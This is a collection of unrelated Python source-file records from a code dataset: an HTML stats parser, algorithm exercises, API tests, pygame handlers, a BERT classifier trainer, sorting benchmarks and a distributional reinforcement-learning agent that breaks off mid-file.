self.foundThrow:\n self.throwHand = data\n self.foundThrow = False\n elif data == 'Born':\n self.foundBorn = True\n elif self.foundBorn:\n if data.strip()[0:2] == 'in':\n self.foundBorn = False\n elif data != ':':\n self.birthDate += data.strip()\n elif data == 'Debut':\n self.foundDebut = True\n elif self.foundDebut:\n if data.strip()[0:4] == '(Age':\n self.foundDebut = False\n elif data != ':':\n self.mlbDebutDate += data.strip()\n\n def handle_endtag(self, tag):\n if tag == 'span' and self.foundBorn:\n self.foundBorn = False\n elif tag == 'span' and self.foundDebut:\n self.foundDebut = False\n\n\nclass BRRSUserIdParser(html.parser.HTMLParser):\n uid = ''\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n for att in attrs:\n if att[0] == 'href' and re.search('http://www.retrosheet.org/boxesetc/./P(.*)\\.htm', att[1]):\n self.uid = re.search('http://www.retrosheet.org/boxesetc/./P(.*)\\.htm', att[1]).group(1)\n\n def handle_data(self, data):\n pass\n\n def handle_endtag(self, tag):\n pass","sub_path":"Deprecated/BRParser.py","file_name":"BRParser.py","file_ext":"py","file_size_in_byte":12769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112957976","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n def maxProfit(self, prices: List[int]) -> int:\r\n if not prices: return 0\r\n dp = [[0]*2 for _ in range(len(prices))]\r\n dp[0][0], dp[0][1] = 0, -prices[0]\r\n for i in range(1, len(prices)):\r\n dp[i][0] = max(dp[i-1][0], dp[i-1][1] + prices[i])\r\n dp[i][1] = max(dp[i-1][1], dp[i-1][0] - prices[i])\r\n return dp[len(prices)-1][0]\r\n\r\ns = Solution()\r\nr = s.maxProfit([3,2,6,5,0,3])\r\nprint(r)","sub_path":"source150/122_maxProfit.py","file_name":"122_maxProfit.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} 
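# Editor's aside on the 122_maxProfit.py record above (an illustrative sketch, not part of the dataset; the name max_profit is ours): each dp[i] row depends only on dp[i-1], so the O(n) table can be collapsed to two running scalars.
#
#     from typing import List
#
#     def max_profit(prices: List[int]) -> int:
#         # cash: best profit with no open position; hold: best profit while holding one share
#         cash, hold = 0, float('-inf')
#         for p in prices:
#             cash, hold = max(cash, hold + p), max(hold, cash - p)
#         return cash
#
#     assert max_profit([3, 2, 6, 5, 0, 3]) == 7  # matches the table-based version above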
+{"seq_id":"339376899","text":"import pytest\n\n\n@pytest.mark.first\ndef test__twitter_users(client, dbsession, models):\n # GIVEN 1,000 Twitter users exist in the database\n NUM_TWITTER_USERS = 1_000\n for idx in range(NUM_TWITTER_USERS):\n dbsession.add(models.TwitterUser(\n screen_name=f'handle_{idx}',\n is_public_figure=True,\n ))\n dbsession.commit()\n\n # WHEN all Twitter IDs are requested\n resp = client.get('/twitter/ids')\n assert resp.status_code == 200, resp.json\n\n # THEN 1,000 IDs are returned\n assert len(resp.json) == NUM_TWITTER_USERS, resp.json\n assert all(isinstance(id_, int) for id_ in resp.json), resp.json\n\n\n@pytest.mark.second\ndef test__followers_count(client, dbsession, models):\n # GIVEN a Twitter user with 1,000 followers\n NUM_FOLLOWERS = 1_000\n public_figure = models.TwitterUser(\n screen_name='first_public_figure',\n is_public_figure=True,\n )\n dbsession.add(public_figure)\n dbsession.flush()\n users = [\n models.TwitterUser(screen_name=f'handle_{idx}')\n for idx in range(NUM_FOLLOWERS)\n ]\n dbsession.add_all(users)\n for user in users:\n public_figure.follow(user)\n dbsession.commit()\n\n # WHEN the count of this user's followers is requested\n resp = client.get(f'/twitter/{public_figure.id}/followers/count')\n assert resp.status_code == 200, resp.json\n\n # THEN 1,000 is returned\n assert resp.json == NUM_FOLLOWERS, resp.json\n\n\n@pytest.mark.third\ndef test__first_requirement(client, dbsession, models):\n # GIVEN at least 2 public figures with shared followers\n NUM_LEFT, NUM_SHARED, NUM_RIGHT = 400, 982, 523\n left, right = (\n models.TwitterUser(\n screen_name=f'public_figure_{idx}',\n is_public_figure=True,\n ) for idx in range(2)\n )\n dbsession.add_all([left, right])\n dbsession.flush()\n left_users = [\n models.TwitterUser(screen_name=f'left_follower_{idx}')\n for idx in range(NUM_LEFT)\n ]\n shared_users = [\n models.TwitterUser(screen_name=f'shared_follower_{idx}')\n for idx in range(NUM_SHARED)\n ]\n right_users = [\n models.TwitterUser(screen_name=f'right_follower_{idx}')\n for idx in range(NUM_RIGHT)\n ]\n dbsession.add_all(left_users)\n dbsession.add_all(shared_users)\n dbsession.add_all(right_users)\n for user in left_users:\n left.follow(user)\n for user in shared_users:\n left.follow(user)\n right.follow(user)\n for user in right_users:\n right.follow(user)\n\n # WHEN\n resp = client.get(f'/twitter/followers/intersect/{left.id}/{right.id}')\n assert resp.status_code == 200\n\n # THEN\n assert resp.json == len(shared_users)\n\n\n@pytest.mark.fourth\ndef test__second_requirement(client):\n # GIVEN\n pass\n\n # WHEN\n\n # THEN\n\n\n@pytest.mark.fifth\ndef test__third_requirement(client):\n # GIVEN\n pass\n\n # WHEN\n\n # THEN\n","sub_path":"tests/test__interviewee.py","file_name":"test__interviewee.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"161684983","text":"import pygame, sys\nfrom pokemon_edit.check import *\n\ndef check_draw(shapes, shape, shape_type, shape_color, pressed, buttons, move_type, index):\n selected = []\n position = pygame.mouse.get_pos()\n for event in [pygame.event.wait()]+pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n move_type, i = check_pressed_buttons(buttons, position, move_type)\n if i < 0:\n shape = [position, (0, 0)]\n pressed = True\n else:\n index = i\n elif event.type == pygame.MOUSEBUTTONUP:\n if shape:\n shapes[tuple(shape)] = 
[shape_type, shape_color]\n                shape = None\n            pressed = False\n        elif pressed:\n            if shape:\n                shape[1] = (abs(position[0] - shape[0][0]), abs(position[1] - shape[0][1]))\n            else:\n                shape = [position, position]\n    return move_type, index, shapes, shape, pressed, selected\n\ndef check_edit(buttons, shapes, move_type, index, selected, ctrl):\n    position = pygame.mouse.get_pos()\n    for event in [pygame.event.wait()]+pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit()\n        elif event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_LCTRL:\n                ctrl = True\n        elif event.type == pygame.KEYUP:\n            if event.key == pygame.K_LCTRL:\n                ctrl = False\n        elif event.type == pygame.MOUSEBUTTONDOWN:\n            move_type, i = check_pressed_buttons(buttons, position, move_type)\n            selection = check_click_in_shape(shapes, position)\n            if i < 0:\n                selected = check_click(selected, ctrl, selection)\n            else:\n                index = i\n    return move_type, index, shapes, selected, ctrl\n\ndef check_attr(buttons, shapes, move_type, index):\n    selected = []\n    ctrl = False  # attribute mode does not track a modifier key\n    position = pygame.mouse.get_pos()\n    for event in [pygame.event.wait()]+pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit()\n        elif event.type == pygame.MOUSEBUTTONDOWN:\n            move_type, i = check_pressed_buttons(buttons, position, move_type)\n            selection = check_click_in_shape(shapes, position)\n            if i < 0:\n                selected = check_click(selected, ctrl, selection)\n            else:\n                index = i\n    return move_type, index, selected","sub_path":"pokemon_edit/modes.py","file_name":"modes.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"251262529","text":"def h():\n    print ('Wen Chuan')\n    m = yield 5 # Fighting!\n    print (m)\n    d = yield 12\n    print ('We are together!')\n\n\nc = h()\nm = next(c) # m receives 5, the value of the first yield\nd = c.send('Fighting!') # d receives 12, the value of the second yield\nprint ('We will never forget the date', m, '.', d)\nm = b''.split(b'\\r\\n',1)","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"261161525","text":"import random\nimport time\nimport torch\nimport numpy as np\nfrom pathlib import PurePath\nfrom sklearn.metrics import accuracy_score\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\nfrom ...common.loader import BertDatasets\nfrom .model import BertClassificationModel\nfrom ...common.utils import batch_print, set_seed\n\nCURR_PATH = PurePath(__file__).parent\nPRE_TRAINED_MODEL_PATH = str(CURR_PATH.parent.parent / \"res/bert_base_wwm/\")\n\ncp = None\npred_model_path = None\n\n\ndef train(data_path,\n          model_path=None,\n          train_size=0.8,\n          model_params=None):\n    \"\"\"\n    :param model_params: finetune, label_weights, dropout, pre_trained_model_path,\n    batch_size, lr, eps, epochs\n    \"\"\"\n    set_seed(2020)\n\n    # updates params\n    if not isinstance(model_params, dict):\n        model_params = dict()\n    finetune = model_params.get(\"finetune\", True)\n    label_weights = model_params.get(\"label_weights\", None)\n    hidden_dim = model_params.get(\"hidden_dim\", 50)\n    dropout = model_params.get(\"dropout\", 0.3)\n    pre_trained_model_path = model_params.get(\"pre_trained_model_path\", PRE_TRAINED_MODEL_PATH)\n    batch_size = model_params.get(\"batch_size\", 64)\n    lr = model_params.get(\"lr\", 1e-4)\n    eps = model_params.get(\"eps\", 1e-8)\n    epochs = model_params.get(\"epochs\", 5)\n    n_jobs = model_params.get(\"n_jobs\", 1)\n\n    # load training data\n    bert_datasets = 
BertDatasets(path=data_path, pre_trained_path=pre_trained_model_path)\n train_data, test_data = bert_datasets.load(n_jobs=n_jobs, train_size=train_size, batch_size=batch_size)\n\n total_steps = len(train_data) * epochs\n\n # init the albert model\n model = BertClassificationModel(num_labels=bert_datasets.num_labels,\n finetune=finetune,\n label_weights=label_weights,\n hidden_dim=hidden_dim,\n dropout=dropout,\n pre_trained_model_path=pre_trained_model_path)\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model.to(device)\n\n optimizer = AdamW(model.parameters(), lr=lr, eps=eps)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0, num_training_steps=total_steps)\n\n for name, param in model.named_parameters():\n print(name, param.shape, param.device, param.requires_grad)\n\n for epoch in range(epochs):\n start_time = time.time()\n # training\n model.train()\n train_loss = 0\n avg_train_loss = 0\n for i, train in enumerate(train_data):\n train_input_ids = train[0].to(device)\n train_input_mask = train[1].to(device)\n train_labels = train[2].to(device)\n\n logits, loss = model(word_seq_tensor=train_input_ids,\n word_mask_tensor=train_input_mask,\n labels=train_labels)\n train_loss += loss.item()\n avg_train_loss = train_loss / (i + 1)\n\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)\n\n optimizer.step()\n scheduler.step()\n\n batch_print(\"[Epoch] \\033[34m{:0>3d}\\033[0m\".format(epoch),\n \"[Batch] \\033[34m{:0>5d}\\033[0m\".format(i),\n \"[lr] \\033[34m{:0>.6f}\\033[0m\".format(scheduler.get_lr()[0]),\n \"[avg train loss] \\033[34m{:0>.4f}\\033[0m\".format(avg_train_loss),\n \"[time] \\033[34m{:<.0f}s\\033[0m\".format(time.time() - start_time),\n flag=\"batch\")\n\n # on-time evaluate model\n model.eval()\n test_loss = 0\n avg_test_loss = 0\n pred_labels, test_labels = [], []\n for i, test in enumerate(test_data):\n test_input_ids = test[0].to(device)\n test_input_mask = test[1].to(device)\n test_label = test[2].to(device)\n\n with torch.no_grad():\n pred_label, loss = model(word_seq_tensor=test_input_ids,\n word_mask_tensor=test_input_mask,\n labels=test_label)\n pred_labels.append(torch.argmax(pred_label.cpu(), -1).float())\n test_labels.append(torch.argmax(test_label.cpu(), -1))\n test_loss += loss\n avg_test_loss = test_loss / (i + 1)\n\n batch_print(\"[Epoch] \\033[34m{:0>3d}\\033[0m\".format(epoch),\n \"[lr] \\033[34m{:0>.6f}\\033[0m\".format(scheduler.get_lr()[0]),\n \"[avg train loss] \\033[34m{:0>.4f}\\033[0m\".format(avg_train_loss),\n \"[avg test lost] \\033[34m{:>0.4f}\\033[0m\".format(avg_test_loss),\n \"[time] \\033[34m{:<.0f}s\\033[0m\".format(time.time() - start_time),\n flag=\"epoch\")\n\n if epoch == epochs - 1:\n acc = accuracy_score(torch.cat(pred_labels, dim=-1).numpy(), torch.cat(test_labels, dim=-1).numpy())\n print(\"The model test accuracy is: \\033[34m{:.5}\\033[0m\".format(acc))\n\n # save model\n if model_path is not None:\n _save_model(path=model_path, model=model, pre_trained_model_path=pre_trained_model_path,\n max_length=bert_datasets.max_length, label2index=bert_datasets.label2idx)\n\n\ndef predict(data=None, data_path=None, model_path=None, **kwargs):\n global cp\n global pred_model_path\n if model_path != pred_model_path:\n cp = _load_model(model_path)\n if cp is None:\n cp = _load_model(model_path)\n pred_model_path = model_path\n\n model = cp['model']\n model.finetune = False\n pre_trained_model_path = cp['pre_trained_model_path']\n max_length = 
cp['max_length']\n label2index = cp['label2index']\n index2label = {v: k for k, v in label2index.items()}\n\n albert_datasets = BertDatasets(path=data_path, data=data, pre_trained_path=pre_trained_model_path)\n test_data = albert_datasets.loadp(max_length=max_length, label2index=label2index, batch_size=64)\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n model.to(device)\n\n model.eval()\n pred_labels = []\n for i, test in enumerate(test_data):\n test_input_ids = test[0].to(device)\n test_input_mask = test[1].to(device)\n\n with torch.no_grad():\n pred_label, loss = model(word_seq_tensor=test_input_ids,\n word_mask_tensor=test_input_mask)\n pred_labels.append(torch.argmax(pred_label.cpu().detach(), -1).float())\n\n pred_label = [index2label[index] for index in torch.cat(pred_labels, dim=-1).numpy()]\n return pred_label\n\n\nclass Predictor:\n def __init__(self, model_path):\n cp = _load_model(model_path)\n self.model = cp['model']\n self.model.finetune = False\n self.pre_trained_model_path = cp['pre_trained_model_path']\n self.max_length = cp['max_length']\n self.label2index = cp['label2index']\n self.index2label = {v: k for k, v in self.label2index.items()}\n\n def predict(self, data=None, data_path=None):\n albert_datasets = BertDatasets(path=data_path, data=data, pre_trained_path=self.pre_trained_model_path)\n test_data = albert_datasets.loadp(max_length=self.max_length, label2index=self.label2index, batch_size=64)\n\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n self.model.to(device)\n\n self.model.eval()\n pred_labels = []\n for i, test in enumerate(test_data):\n test_input_ids = test[0].to(device)\n test_input_mask = test[1].to(device)\n\n with torch.no_grad():\n pred_label, loss = self.model(word_seq_tensor=test_input_ids,\n word_mask_tensor=test_input_mask)\n pred_labels.append(torch.argmax(pred_label.cpu().detach(), -1).float())\n\n pred_label = [self.index2label[index] for index in torch.cat(pred_labels, dim=-1).numpy()]\n return pred_label\n\n\ndef _save_model(path, model, pre_trained_model_path, max_length, label2index):\n torch.save({\n 'model': model,\n 'pre_trained_model_path': pre_trained_model_path,\n 'max_length': max_length,\n 'label2index': label2index\n }, path)\n\n\ndef _load_model(path):\n cp = torch.load(path)\n return cp\n","sub_path":"xatc/models/bert_classifier/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"250873865","text":"N = int(input())\nS = input()\nT = input()\n\nif S == T:\n print(N)\n exit()\nfor i in reversed(range(N)):\n if S[N-i-1:] == T[:i+1]:\n print(2*N - i - 1)\n exit()\n else:\n continue\n\nprint(2*N)","sub_path":"Python_codes/p03951/s460938759.py","file_name":"s460938759.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"55791406","text":"import time\n\n#insertion w set 10 inputs\nprint(\"Insertion Program:\")\nt0 = time.time()\n\ndef insertionSort(alist):\n for index in range(1,len(alist)):\n\n currentvalue = alist[index]\n position = index\n\n while position>0 and alist[position-1]>currentvalue:\n alist[position]=alist[position-1]\n position = position-1\n\n alist[position]=currentvalue\n\nalist = [54,26,93,17,77,31,44,55,20,100000]\ninsertionSort(alist)\nprint(alist)\nt1 = time.time()\nrunTime = t1 - t0\nprint(runTime, \"seconds.\")\n\n\n#quicksort w 
set 10 inputs\n\nprint(\"Quicksort Program:\") \n\nt0 = time.time() \n\ndef quickSort(alist):\n quickSortHelper(alist,0,len(alist)-1)\n\ndef quickSortHelper(alist,first,last):\n if first<last:\n splitpoint = partition(alist,first,last)\n quickSortHelper(alist,first,splitpoint-1)\n quickSortHelper(alist,splitpoint+1,last)\n\ndef partition(alist,first,last):\n pivotvalue = alist[first]\n leftmark = first+1\n rightmark = last\n done = False\n while not done:\n while leftmark <= rightmark and alist[leftmark] <= pivotvalue:\n leftmark = leftmark + 1\n while alist[rightmark] >= pivotvalue and rightmark >= leftmark:\n rightmark = rightmark -1\n\n if rightmark < leftmark:\n done = True\n else:\n temp = alist[leftmark]\n alist[leftmark] = alist[rightmark]\n alist[rightmark] = temp\n\n temp = alist[first]\n alist[first] = alist[rightmark]\n alist[rightmark] = temp\n\n\n return rightmark\n\nalist = [54,26,93,17,77,31,44,55,20,100000]\nquickSort(alist)\nprint(alist)\n\nt1 = time.time()\n\nrunTime = t1 - t0\nprint(runTime, \"seconds.\")\n\n\n#selection with 10 set inputs\nprint(\"Selection Program:\") \n\nt0 = time.time()\n\ndef selectionSort(alist):\n for fillslot in range(len(alist)-1,0,-1):\n positionOfMax=0\n for location in range(1,fillslot+1):\n if alist[location]>alist[positionOfMax]:\n positionOfMax = location\n\n temp = alist[fillslot]\n alist[fillslot] = alist[positionOfMax]\n alist[positionOfMax] = temp\n\nalist = [54,26,93,17,77,31,44,55,20,100000]\nselectionSort(alist)\nprint(alist)\n\nt1 = time.time()\n\nrunTime = t1 - t0\nprint(runTime, \"seconds.\")\n\n","sub_path":"022.3 run time 10 input.py","file_name":"022.3 run time 10 input.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"387153959","text":"# Copyright April 2019.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"The Dominant Particle Network (DPN) agent.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nimport math\n\n\nfrom dopamine.agents.rainbow import rainbow_agent\nimport numpy as np\nimport tensorflow as tf\n\nimport gin.tf\n\nslim = tf.contrib.slim\n\n\n@gin.configurable\nclass DominantParticleAgent(rainbow_agent.RainbowAgent):\n \"\"\"An extension of Rainbow.\"\"\"\n\n def __init__(self,\n sess,\n num_actions,\n num_particles = 64,\n num_target_samples = 32,\n seed_dim = 5,\n blur = 0.05,\n scaling = 0.5,\n tau = 0.1,\n double_dqn=False,\n summary_writer=None,\n summary_writing_frequency=500):\n \"\"\"Initializes the agent and constructs the Graph.\n\n Args:\n sess: `tf.Session` object for running associated ops.\n num_actions: int, number of actions the agent can take at any state.\n num_particles: int, number of particles supporting the discrete return measures.\n num_target_samples: int, number of target distribution draws used to average the loss over one transition.\n seed_dim: int, dimensionality of the input noise vector.\n blur: float, simulated annealing log step size.\n scaling: float, simulated annealing max log scale.\n tau: float, temporal stepsize for the potential energy functional.\n double_dqn: boolean, whether to perform double DQN style learning\n as described in Van Hasselt et al.: https://arxiv.org/abs/1509.06461.\n summary_writer: SummaryWriter object for outputting training statistics.\n Summary writing disabled if set to None.\n summary_writing_frequency: int, frequency with which summaries will be\n written. 
Lower values will result in slower training.\n \"\"\"\n # Number of particles supporting discrete measures\n self.num_particles = num_particles\n # Number of target dists draws for averaging loss over one transition\n self.num_target_samples = num_target_samples\n # Dimensionality of input noise vector\n self.seed_dim = seed_dim\n # Simulated annealing log step size\n self.blur = blur\n # Simulated annealing max log scale\n self.scaling = scaling \n # Simulated annealing scales for entropic regularization\n self.scales = [ np.exp(e) for e in np.arange(1, np.log(self.blur), np.log(self.scaling)) ] + [self.blur]\n # Temporal stepsize for potential energy functional (2*h in paper)\n self.tau= tau\n # Particle weights are all equally-likely\n self.a_i = tf.tile([1.0/self.num_particles],[self.num_particles])[:,None]\n # Particle weights in the log domain\n self.loga_i = tf.math.log(self.a_i)\n self.logb_i = tf.math.log(self.a_i)\n # Option to perform double dqn.\n self.double_dqn = double_dqn\n\n super(DominantParticleAgent, self).__init__(\n sess=sess,\n num_actions=num_actions,\n summary_writer=summary_writer,\n summary_writing_frequency=summary_writing_frequency)\n\n def _get_network_type(self):\n \"\"\"Returns the type of the outputs of the Dominant Particle Network.\n\n Returns:\n _network_type object defining the outputs of the network.\n \"\"\"\n return collections.namedtuple('dpa_network', ['particle_locs'])\n\n def _network_template(self, state, num_draws = 1):\n r\"\"\"Builds a Dominant Particle Network.\n\n Takes state and seed as inputs and outputs particle vectors that support\n finite return distributions for every action.\n\n Args:\n state: A `tf.placeholder` for the RL state.\n num_draws: int for the number of draws of return dists \n\n Returns:\n _network_type object containing particle outputs of the network.\n \"\"\"\n\n weights_initializer = slim.variance_scaling_initializer(\n factor=1.0 / np.sqrt(3.0), mode='FAN_IN', uniform=True)\n\n # Prepare image (state) input\n state_net = tf.cast(state, tf.float32)\n state_net = tf.math.divide(state_net, 255.)\n\n # Tile the batch dimension for each network draw \n # (batch_size x num_draws, state_dims)\n batch_size = state_net.get_shape().as_list()[0]\n state_net = tf.tile(state_net,[num_draws,1,1,1])\n\n # Convolutional portion to extract image features\n state_net = slim.conv2d(\n state_net, 32, [8, 8], stride=4,\n weights_initializer=weights_initializer)\n state_net = slim.conv2d(\n state_net, 64, [4, 4], stride=2,\n weights_initializer=weights_initializer)\n state_net = slim.conv2d(\n state_net, 64, [3, 3], stride=1,\n weights_initializer=weights_initializer)\n\n # Flatten image features and tile for num particles\n # (batch_size, feature_dim)\n state_net = slim.flatten(state_net) # image features\n\n # Prepare noise input\n # (batch_size x num_draws, seed_dim)\n seed_net = tf.random_normal([batch_size*num_draws,self.seed_dim],dtype=tf.float32)\n\n # Join the two image features and the seed as input to the\n # fully-connected portion of the network\n # (batch_size x num_draws x num_particles, feature_dim + seed_dim)\n net = tf.concat([state_net, seed_net],1) \n net = tf.tile(net, [self.num_particles, 1])\n\n # The fully-connected portion maps image features and noise\n # to vectors of particle locations for each action\n net = slim.fully_connected(net, 512, weights_initializer=weights_initializer)\n particle_locs = slim.fully_connected(net,self.num_actions,\n activation_fn=None,weights_initializer=weights_initializer)\n\n return 
self._get_network_type()(particle_locs=particle_locs)\n\n def _build_networks(self):\n \"\"\"Builds the DPN computations needed for acting and training.\n\n These are:\n self.online_convnet: For computing the current state's return particle locations.\n self.target_convnet: For computing the next state's target return particle locations\n values.\n self._net_outputs: The return particle locations.\n self._q_argmax: The action maximizing the current state's Q-values.\n self._replay_net_outputs: The replayed states' return particle locations.\n self._replay_next_target_net_outputs: The replayed next states' target return particle locations.\n \"\"\"\n # Calling online_convnet will generate a new graph as defined in\n # self._get_network_template using whatever input is passed, but will always\n # share the same weights.\n self.online_convnet = tf.make_template('Online', self._network_template)\n self.target_convnet = tf.make_template('Target', self._network_template)\n\n # Compute the Q-values which are used for action selection in the current\n # state.\n self._net_outputs = self.online_convnet(self.state_ph,1)\n\n # Shape of self._net_outputs.quantile_values:\n # num_particles x num_actions.\n # e.g. if num_actions is 2, it might look something like this:\n # Vals for Quantile .2 Vals for Quantile .4 Vals for Quantile .6\n # [[0.1, 0.5], [0.15, -0.3], [0.15, -0.2]]\n # Q-values = [(0.1 + 0.15 + 0.15)/3, (0.5 + 0.15 + -0.2)/3].\n self._q_values = tf.reduce_mean(self._net_outputs.particle_locs, axis=0)\n self._q_argmax = tf.argmax(self._q_values, axis=0)\n\n self._replay_net_outputs = self.online_convnet(self._replay.states, 1)\n # Shape: (batch_size x num_particles) x num_actions. \n self._replay_net_particle_locs = self._replay_net_outputs.particle_locs\n\n # Do the same for next states in the replay buffer.\n self._replay_net_target_outputs = self.target_convnet(self._replay.next_states, self.num_target_samples)\n # Shape: (batch_size x num_target_samples x num_particles) x num_actions.\n vals = self._replay_net_target_outputs.particle_locs\n self._replay_net_target_particle_locs = vals\n\n # Compute Q-values which are used for action selection for the next states\n # in the replay buffer. 
Compute the argmax over the Q-values.\n if self.double_dqn:\n outputs_action = self.online_convnet(self._replay.next_states, self.num_target_samples)\n else:\n outputs_action = self.target_convnet(self._replay.next_states, self.num_target_samples)\n\n # Shape: (num_particles x batch_size x num_target_samples) x num_actions.\n target_particle_locs_action = outputs_action.particle_locs\n # Shape: num_particles x (batch_size x num_target_samples) x num_actions.\n target_particle_locs_action = tf.reshape(target_particle_locs_action,\n [self.num_particles,\n self._replay.batch_size*self.num_target_samples,\n self.num_actions])\n \n # Shape: (batch_size x num_target_samples) x num_actions.\n self._replay_net_target_q_values = tf.squeeze(tf.reduce_mean(target_particle_locs_action, axis=0))\n\n # Shape: (batch_size x num_target_samples) x 1\n self._replay_next_qt_argmax = tf.argmax(self._replay_net_target_q_values, axis=1)\n\n def _build_target_quantile_values_op(self):\n \"\"\"Build an op used as a target for return values at given quantiles.\n\n Returns:\n An op calculating the target quantile return.\n \"\"\"\n batch_size = tf.shape(self._replay.rewards)[0]\n # Shape of rewards: (num_target_samples x num_particles x batch_size) x 1.\n rewards = self._replay.rewards[:, None]\n rewards = tf.tile(rewards, [self.num_particles*self.num_target_samples, 1])\n\n # Incorporate terminal state to discount factor.\n # size of gamma_with_terminal: (num_target_samples x num_particles x batch_size) x 1.\n is_terminal_multiplier = 1. - tf.cast(self._replay.terminals,tf.float32)\n gamma_with_terminal = self.cumulative_gamma * is_terminal_multiplier\n gamma_with_terminal = tf.tile(gamma_with_terminal[:, None], [self.num_particles*self.num_target_samples, 1])\n\n # Get the indices of the maximum Q-value across the action dimension.\n # Shape of replay_next_qt_argmax: (batch_size x num_target_samples x num_particles) x 1.\n replay_next_qt_argmax = tf.tile(self._replay_next_qt_argmax[:, None], [self.num_particles, 1])\n\n # Shape of batch_indices: (batch_size x num_target_samples x num_particles) x 1.\n batch_indices = tf.cast(tf.range(batch_size * self.num_target_samples * self.num_particles)[:, None], tf.int64)\n\n # Shape of batch_indexed_target_values:\n # (batch_size x num_target_samples x num_particles) x 2.\n batch_indexed_target_values = tf.concat([batch_indices, replay_next_qt_argmax], axis=1)\n\n # Shape of next_target_values: (batch_size x num_target_samples x num_particles) x 1.\n target_particle_set = tf.gather_nd(\n self._replay_net_target_particle_locs,\n batch_indexed_target_values)[:, None]\n\n return rewards + gamma_with_terminal * target_particle_set\n\n def _build_train_op(self):\n \"\"\"Builds a training op.\n\n Returns:\n train_op: An op performing one step of training from replay data.\n \"\"\"\n batch_size = tf.shape(self._replay.rewards)[0]\n\n # Shape: (batch_size x num_target_samples x num_particles) x 1\n target_particle_set = tf.stop_gradient(self._build_target_quantile_values_op())\n\n # Reshape to num_particles x batch_size x 1 since this is\n # the manner in which the target_quantile_values are tiled.\n target_particle_set = tf.reshape(target_particle_set,\n [self.num_particles,\n batch_size,\n self.num_target_samples, 1])\n\n # Transpose dimensions so that the dimensionality is batch_size x\n # self.num_particles x 1 to prepare for computation of\n # Bellman errors.\n # Final shape of target_quantile_values:\n # batch_size x num_target_samples x num_particles x 1.\n 
target_particle_set = tf.transpose(target_particle_set, [1, 2, 0, 3])\n\n # Shape of indices: (batch_size x num_particles) x 1.\n # Expand dimension by one so that it can be used to index into all the\n # particles when using the tf.gather_nd function (see below).\n indices = tf.range(batch_size * self.num_particles)[:, None]\n\n # Expand the dimension by one so that it can be used to index into all the\n # quantiles when using the tf.gather_nd function (see below).\n reshaped_actions = self._replay.actions[:, None]\n reshaped_actions = tf.tile(reshaped_actions, [self.num_particles, 1])\n\n # Shape of reshaped_actions: (batch_size x num_particles) x 2.\n reshaped_actions = tf.concat([indices, reshaped_actions], axis=1)\n\n # Reshape to self.num_particles x batch_size x 1 since this is the manner\n # in which the quantile values are tiled.\n # (batch_size x num_target_samples) x num_particles x 1.\n chosen_action_particles = tf.gather_nd(self._replay_net_particle_locs, reshaped_actions)[:,None]\n chosen_action_particles = tf.tile(chosen_action_particles,[self.num_target_samples,1])\n chosen_action_particles = tf.reshape(chosen_action_particles, \n [self.num_particles,batch_size,self.num_target_samples, 1])\n\n # Transpose dimensions so that the dimensionality is batch_size x\n # self.num_particles x 1 to prepare for computation of\n # Bellman errors.\n # Final shape of chosen_action_particles:\n # num_tau_samples = num_particles (keep until code runs)\n # num_tau_prime_samples = num_of_target_samples (keep until code runs)\n # batch_size x num_particles x 1.\n chosen_action_particles = tf.transpose(chosen_action_particles, [1, 2, 0, 3])\n\n # Shape of bellman_errors and huber_loss:\n # batch_size x num_target_samples x num_particles x 1.\n bellman_errors = target_particle_set - chosen_action_particles\n\n # Compute the L2 loss over the particles\n # batch_size x num_target_samples x 1\n l2_loss = tf.reduce_mean(0.5 * bellman_errors**2 , axis=2)\n\n # Compute the entropy-regulated Wasserstein loss\n # e-scaling heuristic (aka. 
